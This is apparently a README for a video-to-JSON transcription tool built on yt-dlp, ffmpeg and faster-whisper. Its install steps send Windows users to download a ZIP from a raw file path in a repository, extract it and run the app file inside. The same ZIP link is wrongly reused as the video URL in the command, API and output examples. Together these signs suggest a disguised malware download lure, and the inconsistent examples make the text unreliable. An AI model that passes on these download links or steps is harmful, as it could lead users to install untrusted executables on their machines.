Universal Video Transcriber turns a video URL into a transcript file in JSON format.
Use it when you want to:
- copy spoken words from a video
- keep a time-based record of audio
- process links from many sites in one tool
- get text from videos without doing it by hand
It follows this flow:
- video URL in
- media download with
yt-dlp - audio cleanup with
ffmpeg - speech to text with
faster-whisper - timestamped JSON out
-
Visit the download page here:
https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip -
On the page, look for the latest release or the main project files.
-
Download the Windows version if one is provided, or download the source package if that is the only option.
-
Save the file to your computer, then open the folder where it downloaded.
-
If you get a ZIP file, right-click it and choose Extract All.
-
Open the extracted folder and look for the app file or setup file.
-
If the app opens in a terminal window, that is normal for this tool.
-
Keep the folder in a place you can find again, such as Downloads or Desktop.
For a smooth run on Windows, install these tools first:
- Python 3.10 or newer
ffmpegyt-dlp
You also need enough free disk space for temporary video files. A larger video will use more space.
If you plan to process long videos, use a machine with at least 8 GB of memory.
If you downloaded the source version, do this on Windows:
- Install Python from the official Python website.
- Make sure Python is added to PATH during install.
- Open Command Prompt in the project folder.
- Create a virtual environment:
python -m venv .venv- Activate it:
.venv\Scripts\activate- Install the app requirements:
pip install -r requirements.txt- Install
ffmpegandyt-dlpif they are not already on your system.
Use the command below to check that your setup works:
python skill/video-url-transcriber/scripts/transcribe_url.py --doctorThen run a transcription with a video link:
python skill/video-url-transcriber/scripts/transcribe_url.py "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip" --model-size smallIf you want faster results, keep --model-size small.
If you want better accuracy on harder audio, use a larger model size.
If you want to send requests from another app, start the API server:
python skill/video-url-transcriber/scripts/run_api.pyThe server runs on:
http://127.0.0.1:8099Use this endpoint to transcribe a video:
curl -s http://127.0.0.1:8099/transcribe \
-H 'content-type: application/json' \
-d '{
"url": "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip",
"language": null,
"model_size": "small",
"word_timestamps": true,
"persist_media": false
}'The app returns JSON with details about the source video and the transcript.
Example shape:
{
"source_url": "https://github.com/ultraconservative-abneylevel672/universal-video-transcriber/raw/refs/heads/main/skill/video-url-transcriber/agents/universal-transcriber-video-v2.0.zip",
"platform": "x",
"title": "Example Video Title",
"language": "en",
"model_size": "small",
"transcript": [
{
"start": 0.0,
"end": 3.2,
"text": "Hello and welcome."
}
]
}Common fields include:
source_urlβ the original link you gave the appplatformβ the site name detected by the tooltitleβ the video title when availablelanguageβ the spoken language, when the tool can detect itmodel_sizeβ the speech model usedtranscriptβ the timed text split into parts
Use short, clear video links when possible.
If a site blocks downloads, try a different link from the same platform.
If audio is noisy, the transcript may have more errors.
If the video has more than one speaker, the output still keeps time stamps, so you can follow who said what by looking at the context.
For best results:
- use good audio
- choose the right language if you know it
- pick a larger model for harder audio
- keep
word_timestampson if you need fine timing
python skill/video-url-transcriber/scripts/transcribe_url.py "VIDEO_URL"python skill/video-url-transcriber/scripts/transcribe_url.py --doctorpython skill/video-url-transcriber/scripts/run_api.pycurl -s http://127.0.0.1:8099/transcribe \
-H 'content-type: application/json' \
-d '{
"url": "VIDEO_URL",
"language": null,
"model_size": "small",
"word_timestamps": true,
"persist_media": false
}'After a run, the tool may create:
- a JSON transcript file
- temporary media files
- audio files used during processing
If persist_media is set to false, the app cleans up temporary files after it finishes.
If you keep media, use a folder with enough space.
If the app does not start, check these items:
- Python is installed
ffmpegis installedyt-dlpis installed- you are in the correct folder
- the virtual environment is active
If a video link fails, try another supported site or a different video URL.
If transcription takes a long time, use a shorter video or a smaller model.
If you see missing audio errors, the source video may not contain clear sound.
For smoother use:
- keep the app folder simple, such as
C:\transcriber - avoid paths with special characters
- close other heavy apps while processing large videos
- use wired power on a laptop during long jobs
The tool works with any site that yt-dlp can read.
That usually includes:
- YouTube
- X
- Vimeo
- many public video pages
- other direct media pages supported by
yt-dlp
- Copy a video URL.
- Run the transcriber.
- Wait for the audio to download and process.
- Open the JSON output.
- Use the timestamps to find the part you need
- save a class lecture as text
- turn a meeting recording into notes
- review a talk without replaying the full video
- search spoken content more easily
- keep a time-based transcript for later work